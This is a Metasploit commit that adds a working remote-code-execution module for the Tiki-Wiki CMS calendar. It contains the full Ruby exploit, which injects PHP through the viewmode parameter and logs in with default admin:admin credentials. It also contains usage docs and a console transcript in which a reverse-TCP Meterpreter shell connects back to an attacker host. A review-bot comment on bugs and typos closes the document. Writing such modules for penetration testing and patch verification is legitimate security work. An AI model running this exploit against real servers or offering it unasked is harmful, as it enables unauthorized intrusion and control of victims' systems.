tiki calendar

bug/bundler_fix
h00die 2016-06-18 13:11:11 -04:00
parent 17f0a0770f
commit 3feff7533b
2 changed files with 234 additions and 0 deletions


@ -0,0 +1,76 @@
## Vulnerable Application
Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
### Creating A Testing Environment
1. Create a fresh Ubuntu 16.04 w/ a LAMP install
2. `apt-get install php-xml`
3. Normal php install at that point!
4. After install, login as admin:admin
5. Go to the Control Panels
6. Click Features
7. Enable Calendar under Main feature
8. Click Apply
#### Permissions
If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar
1. Log in as admin
2. From the top dropdown select permissions
3. Check Anonymous near the top
4. Click Assign
## Verification Steps
1. Install the software as documented above
2. Start msfconsole
3. Do: `use exploit/linux/http/tiki_calendar_exec`
4. Do: `set rhost 10.10.10.10`
5. (optional, if not set, set username to empty) Do: `set PASSWORD admin`
6. Do: `set payload php/bind_perl`
7. Do: `check`
```
[+] 10.10.10.10:80 The target is vulnerable.
```
7. Do: `exploit`
8. You should get a shell
## Options
**PASSWORD**
Password is set at first login. Default for admin is 'admin'.
## Scenarios
Example of running the ID command
```
msf > use exploit/linux/http/tiki_calendar_exec
msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
rhost => 192.168.2.190
msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
targeturi => /t14_1/
msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(tiki_calendar_exec) > set verbose true
verbose => true
msf exploit(tiki_calendar_exec) > set username ''
username =>
msf exploit(tiki_calendar_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) to 192.168.2.190
[*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
meterpreter > sysinfo
Computer : tikiwiki
OS : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Meterpreter : php/php
meterpreter >
```


@ -0,0 +1,158 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Tiki-Wiki CMS Calendar Command Execution',
'Description' => %q(
Tiki-Wiki CMS's calendar module contains a rmeote code execution
vulnerability within the viewmode GET parameter.
The calendar module is NOT enabled by default. When enbled,
the default permissions are set to NOT allow anonymous users
to access.
Vulnerable versions: <=14.2, <=12.5 LTS, <=9.11 LTS and <=6.15
Verified/Tested against 14.1
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'Dany Ouellet' # discovery
],
'References' =>
[
[ 'EDB', '39965' ],
[ 'URL', 'https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki']
],
'License' => MSF_LICENSE,
'Platform' => %w( php ),
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 06 2016'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The URI of Tiki-Wiki', '/']),
OptString.new('USERNAME', [ false, 'Username of a user with calendar access', 'admin']),
OptString.new('PASSWORD', [ false, 'Password of a user with calendar access', 'admin'])
], self.class
)
end
# returns cookie regardless of outcome
def authenticate
begin
# get a cookie to start with
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login_scr.php'),
'method' => 'GET'
)
cookie = res.get_cookies
# if we have creds, login with them
vprint_status('Attempting Login')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-login.php'),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' =>
{
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD'],
'login' => '',
'stay_in_ssl_mode_present' => 'y',
'stay_in_ssl_mode' => 'n'
}
)
if res && res.redirect? && res.redirection.to_s.end_with?('tiki-login_scr.php')
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
elsif res && res.redirect?
vprint_status("Verifying login... Visiting redirect to: #{res.redirection}")
res = send_request_cgi(
'uri' => res.redirection.to_s,
'method' => 'GET',
'cookie' => cookie
)
# double check auth worked and we got a Log out on the page.
# at times I got it to auth, but then it would give permission errors
# so we want to try to double check everything is good
unless res.body =~ /Log out/
fail_with(Failure::UnexpectedReply, "#{peer} Login Failed with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
end
vprint_good("Login Successful!")
return cookie
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def check
begin
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
flag = Rex::Text.rand_text_alpha(10)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';print(#{flag});$a='"
}
)
if res
if res.body =~ /You do not have permission to view the calendar/
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
elsif res.body =~ /#{flag}/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
begin
if datastore['USERNAME'] && !datastore['USERNAME'].blank?
cookie = authenticate
end
vprint_status('Sending malicious calendar view packet')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'tiki-calendar.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'viewmode' => "';#{payload.encoded};$a='"
}
)
if res && res.body =~ /You do not have permission to view the calendar/
fail_with(Failure::NoAccess, "#{peer} - Additional Permissions Required")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
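Review bot: `check` returns nil instead of a CheckCode when the calendar request yields no response, because the trailing `if res` block has no else branch and nothing is returned after it; add `return Exploit::CheckCode::Unknown unless res` before that `if` so the framework always receives a CheckCode. `authenticate` has the same gap: `cookie = res.get_cookies` and, after following the redirect, `res.body =~ /Log out/` both dereference `res` without a nil guard, so a dropped connection surfaces as a NoMethodError rather than the intended `fail_with(Failure::Unreachable, ...)`. The two login-failure `fail_with` messages also interpolate `datastore['PASSWORD']`, which writes the credential into console output and logs; reporting only the username is enough to diagnose the failure. Finally, the description text has two typos ("rmeote", "enbled") that should be corrected before merge.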